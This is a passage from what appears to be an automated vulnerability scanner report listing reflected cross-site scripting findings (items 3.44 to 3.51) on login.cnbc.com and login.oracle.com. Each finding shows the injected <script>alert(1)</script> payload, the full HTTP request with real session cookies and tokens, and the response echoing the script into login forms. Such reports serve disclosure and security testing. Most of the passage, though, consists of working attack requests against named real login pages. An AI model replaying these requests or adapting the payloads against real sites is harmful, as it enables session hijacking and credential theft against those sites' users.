Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88588


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check9b9cd"><script>alert(1)</script>792007f2f0&login_view=register">
...[SNIP]...

3.44. https://login.cnbc.com/cas/login [login_view parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the login_view request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f224b"><script>alert(1)</script>829e8aaba58 was submitted in the login_view parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=registerf224b"><script>alert(1)</script>829e8aaba58 HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:11 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88659


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=registerf224b"><script>alert(1)</script>829e8aaba58">
...[SNIP]...

3.45. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 55fd4'><script>alert(1)</script>bb9117bee86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&55fd4'><script>alert(1)</script>bb9117bee86=1 HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88638


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<iframe name="regFrame" frameborder="0" class="registerFrame" style='height:800px;' scrolling="no" src='https://register.cnbc.com/registerUser.do?iframe=yes&source=register&55fd4'><script>alert(1)</script>bb9117bee86=1'>
...[SNIP]...

3.46. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67364"><script>alert(1)</script>6e7c0304749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&67364"><script>alert(1)</script>6e7c0304749=1 HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:35 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88638


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&67364"><script>alert(1)</script>6e7c0304749=1">
...[SNIP]...

3.47. https://login.cnbc.com/cas/login [service parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the service request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beaf8"><script>alert(1)</script>27bcb15f035 was submitted in the service parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_checkbeaf8"><script>alert(1)</script>27bcb15f035&login_view=register HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:09 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88589


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_checkbeaf8"><script>alert(1)</script>27bcb15f035&login_view=register">
...[SNIP]...

3.48. https://login.cnbc.com/cas/login [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34868"><script>alert(1)</script>3f8471aa8dc was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header34868"><script>alert(1)</script>3f8471aa8dc&login_view=header HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; TZM=-300; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:32 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 5727
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header34868"><script>alert(1)</script>3f8471aa8dc&login_view=header">
...[SNIP]...

3.49. https://login.cnbc.com/cas/login [source_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the source_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb331"><script>alert(1)</script>a8ddc251ca7 was submitted in the source_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=procb331"><script>alert(1)</script>a8ddc251ca7&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:54 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 7137
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=procb331"><script>alert(1)</script>a8ddc251ca7&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription">
...[SNIP]...

3.50. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /oam/server/sso/auth_cred_submit

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload c1951<script>alert(1)</script>81611ea9517 was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oam/server/sso/auth_cred_submit?v=v1.4&request_id=-11174233175931698103c7b4%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ed6751adef14af5029c1951<script>alert(1)</script>81611ea9517 HTTP/1.1
Host: login.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: p_org_id=1001; p_lang=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315342940933; gpv_p24=no%20value; gpw_e24=no%20value; OAM_REQ=VERSION_4~NxywdvpcawCyMkTM4G71qJsOq72hZVWrUNC3MjhZV9f3dtJf5aL3%2flDPZgqxy71LbJwEeSlEW%2bymPmYi5xnQd1VhYNUy5BAaQuWYV1QPtKgkHgViQXuu26%2fj9P%2bw7wamSRLoSY38UWPAZZDVHEosIjfK91K4L24lW4XlijkOrHkWMnkThMoCKL%2bm%2fkypFHNQZbPrecqEbxIQ%2fmL1U5EjmghHZqmMKsGwfiolkoWQOZxYTitVababmv1AA2pygpRMHDHB3W0UuNa9IPK%2bWkEj7AzlwgJ%2fsOwSy6GgL4C6l6NBQqxbGALlu6wLGhs5CKMzrVnQuA9NYhkBoYNMq%2bCeiIvgzIykEQVBwnmmKyvVvDqW8dGr%2fTLu5ygIeagS0vuoz7CbOcyEcz27f8vx5%2fqclvJSD7mbtCvuMPbprZKgdGRSci3Z0qQF4Jkyj7YVT2LV008x7AIUy3QkD0rVEoH2xVeMEOUn7VAou3g28%2b%2bOUB3OZroMTKz273KYFOQk3bQBOTUoFLCR%2bQyOlwxMhhIJ46nIPIAn%2fcQ5NZtupalbBJ7rQNdrYpyvQGz%2bdftIr%2ff31bi1Diah8geTQiyN4%2fZ3KcMqlP9TnOuY5hEGmm4wObcg5WglrQVYV7isRF6AWRkd%2bk1kEROGepai8RjtcAegR%2b5Z%2bvUec4r7a%2b75gZc48dgS%2faR8ruh9CTlAwpKcFob2kF%2bHchzeWKHKjkNcAWhSbGFjrK4swdSEankx6biqm5UVJCpSmc%2fAq%2f1fgZR9sjRHHVSxrgB8EnObY98hf1BCukBz8mQps1PektbRn%2fALeHk%2fS9pVnjKwJFaXsNxsZt7TeEYc%2b71Dnk%2fz8YCzpWeR%2f%2bPl8unuOYUH1q44XoUMeLi1%2bADiVqRneB63%2ftWzOWBp50u1N%2bTy1Kxey3dC%2fdoECGY5XNp5zCsHkUZul5sxXdCUW8lNpPzmarHhun73cOKwJBV7ogKTADKqN7ertSGyqCCjzSMI40kgozmLHU2oD9JDPg28mWXowW1qliMYnh%2ffjkD6OqiHp3Y%2fzNYwnBP7Zh%2buj2%2fyGD%2fPaFWIi6cQrOgRdNlcb0Xc%2fl97NrLc8abdD%2f2un8kDJBUiE8023fM0yFwVHx6uFPqFC%2b%2fngCymDqp1UfTNFD5jCD6p7puTqmmLhUDn6xfgKkZhyCMLrpj26EuwcS7RSm7%2fS%2bkrjH5E3lHwAy7ss%2f4F2fNwASHfwHnFJSGkvYhLj3AL5tPNeNBKhhv%2bn4YDvdI65VI%2f985I9wzT5mDJ1xu6Z4lWDWiA5b8LGOn1dLaUvEN64D5Z53%2bY53LwfiQwVsaYFhOkJuG8Xp1nQWOuaPahq6jJTJgjFzJwBnE%2fGjHnoymO2FRpu48mOQooisWYBNUBz8Z8XWYk59Pmpr2QbX2lyJwghsEhfdMEBFfE4FIJ0sX93gHzRH9UUOwvWTsKqVZu82K6yOUAOUr7etnP4vYyxqUss0NXMcoXF7HQftpSaRbwpUtZ1B8F3feEjs9tBu45afXQ%2f%2fSOWltFnIIGzJzbE%2fvCkj9em8VBWnmiD%2bV3rKjz97EImPLbVavhHui4v98zrLQqvLqqytf%2fVCeOVu1MWD3zkUoC%2boXnBk%2bQw92SwOYQPwwouiBG%2b28Wl1QaypOncFf99oGzCgdaVMoKy7I1ClMk7jlTETTOWm09pk1afrjvV4tOZQ%2bz59ytqFim1FRiwWoC6yqRWJo%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:18:57 GMT
Set-Cookie: OAM_REQ=VERSION_4~EsY9351n%2bL75TyUMNl8LPW73mzYZPslZUdvAtbyf8I%2fsrrJG5gzSLEfs2wZO0aEEm%2f3JWzNmG5jKe1aJAnCDP45JBWjpLTnQMtc34bOV7V2iNl%2bMrXJxYSb8XBcWr%2foOxZLH36duZJi1Fm4481Kymq8RinvKKwEhGJLJOFo2%2fB0wEjM60VcUlsN%2fKUtXh4CgEjVg7oZzDAHzJEz0lBT0G0mYFIZUWbAwWFsi8vdddXkh3cGZotSc7eeh%2boqhYbRAAiGh1v7c4RTA%2fxqbZqQ9pHeY3qYge8IjHXdqcNQnfDNGI0eFb4QBv1JTF2%2fKIjJfwvgdn6nr1SICR86ih13Yu1t2KpaAAYmeonATsz0XlE%2bU6kXqcKnt0dInUlPhrsLbWee5NP9%2f19mt6gV9zPvaM7hDwtQuWCcNU4htv8gXHjTQBxsA%2b2SvZtvr0kIZkXlmkGg%2fb%2foAVB9D0pFXD6Ggh9cdooUvzY4viPGsxAfoI%2f591d7glZBOLkgUvS48uK6RRu8NbzYWHtpXaa%2bYmBTshVsE13YQpK4ObNWjS72Y5vFAmdYi7HisthZdJD%2bHKoa%2bOdwh7tD%2fYIf3aJj78SR9ufKcbtbzLYE6SRCixeTUyhCUnGsbtdI31KyQLmKtrx2kgJDwqmaIim5jLj099PmJF0gU0RYjYzuUbYwR45faQYsxxEoQ7mnGRwfyy5s4fmWlSX9cHmRyX8MW2EPSMraeHUpS33ko2QOwyIrkrEHFOjXrYfd%2b2yVFLS9IXJUiBwGSoRAF1LeDE2dHSjlLkLsSWTwm7oTRF98APeVSfu2R1J4uop1cWyJRFoJExHTDPjtafiU719gvppS0djK92osAheYsmsO4A9K3cLOBuVRPQJluOSLGsSFMpr%2fbqQYp6y8T0dAMi3Ds%2f9%2foCumvkBAgtzYNYsKhiKGbLTi0rzOD4e0jK0hoVDZrNvRpgKBl%2fvq0kUxndQ5un4EUFmbJp%2fE%2b%2bnjaGwCuXkMTK%2buWsVLQyiaxJS4EiCg42C4vv1PHJL1C9jHFtkkgU1fdTb6Yx6Wj2uU%2fByUOD94IPUfC%2bNe0cX%2fHcutt3ZxhT%2bkDMxUxcjIDBZv%2bjbISVrlcqGQ4ntNi2PSo9U2Gqrt1AeNkQ3K%2bzddfzhCG1M6bw8RoPiwzmjq6cLwQnbDKRHZqcJjGfW6FmionsHL4QaXJXEnlW88m9xVGQSZ8pIn1nBQJU26i68WyubXHx7jGY2yvR2Ru5kgn8PI0iaAsSWrmDsmvWI5v6Kf4i7P5Nm8CFY9TxPTz849yBwTijE5fAsm7L4F8CLSmt89c98WJd6N%2bEFyMapg9wfYYko62Zd7HhEbEhmauhmH7HnDCWwkjxJy%2fKRi2RxzUptRMTQ%2bgSnCV5RACLDybfDacI5duyXUFjDqxPyka7YQMifwTXMqc3I7yEM18nPI3Y3g6Pn4vS9bIKfmfbkDjkPf1Lu%2fz%2bNBXWNYccZhpG%2bndCyVP9CMRwLXGXxi85ZQvMKNEb8UzlaokmVmoMOXLkDYZyao7nbTJz7HzACTg%2bJOPN6ODWcwIr%2bbaGqTdMQQqLBa1KUkkVHx33BbHmyWSx6md0HukHmNASFcrFOuUkzd1RgurnTT7F%2bWo7huPmYTZ5pkYL%2fxHh5nXWaUsT%2f%2bHJ3LgdFdRvSgHzSSKQXl2K5HA%2bafmHtpxAgjYIr%2f12UctTk8YSf1XNIlrJjw3oLycqG3pChKZPr1DE%2bJjgVSTtL8VOC5tisuN5sEc%2fl3lM1yEGpm4LlDAWVY0D4v03%2brC9QMFtOF2qj%2bg0QZ2QxGggBLrs9B%2bf5L2cszHFtNSmEPvb0x6UIkFqgSfaz3bAKqM6VzRhBOrRC9lTl6C1unvfpSlrjT5Atd7Wplo72DP7htU9fVHm50C9vn8vTujqBCpXdmpzbEbwHbDMvwGy5GJOgva64ea0ayQeOm1Rr1jzwXX9BMO8dpefvXa5fo6IpgF%2bDE5jAf5JfBDwNyAFF51SwB5L6xBQndB1cLNqYJqdOBQUg%3d%3d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zYGTK6uHK6EVADUS1EHWFB01tbde
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:18:57 GMT; path=/
Content-Length: 2709

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...
</script>d6751adef14af5029c1951<script>alert(1)</script>81611ea9517">
...[SNIP]...

3.51. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /oam/server/sso/auth_cred_submit

Issue detail

The value of the request_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c7b4"><script>alert(1)</script>d6751adef14af5029 was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /oam/server/sso/auth_cred_submit?v=v1.4&request_id=-11174233175931698103c7b4"><script>alert(1)</script>d6751adef14af5029&OAM_REQ=VERSION_4%7EJ%252bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%252bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%252bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%252flJzu7m9%252f1lXhQDZkvLYt%252bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%252fwXpbFtlj2kGJ%252fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%252f%252fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%252fDEO%252fCYluZce8U%252bGGbT0K9o1sJA4XjxLL8%252f8AfNO%252fwgLKh%252bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%252f1ao%252btvjJSu1MtNbwWjD8UmI6Bp%252bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%252fcJMIXtw%252fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%252b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%252bbfWK8%252f54EneCznHCw32Dn13%252f%252b2dACr4TQeKM9Oua%252f%252bwnu%252bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%252bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%252fPItNWUsY%252bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%252fk2aJmyp8Ow%252fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%252bEXUOC%252f6G2f3htenFJenmnMekNtGu%252fXfaFZL8GjhhVe5W2JhMe%252bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%252fvB%252bACTy9lrXfSV77QwN%252buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%252bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%252fD4y50BLNBJCH%252b8a6B8NLIOqiOoU%252fCEYSRHDnFZv5HTMnTiqJZ%252bljcmdaGu3BPZkHEknjwJ%252frdJN%252fF4KZDIxyB3z0Gc63SxU5%252bTOVa2gKg9LLQNB2%252bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%252fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%252f010hrRBg%252bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%252f5w%253d%253d&site2pstoretoken=v1.2%7E15AB5291%7ECA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3CA7C179F2B6A77573D5C53030D02597238CD1C3E0212AE912A5703E640DF935186B51AB3DFAEEE7B2A7E20FF4542015DBB0457891C5A4461CB4B4A23EB51909CE24B245C0A7CB1A8EBE5AC1C84D4342665B366BF177D22BAC7C46B7421C202F9871EF6C385B9C84ABA7DAB0DE4470E2A9204FA9C682&locale=&ssousername=xss&password=xss HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
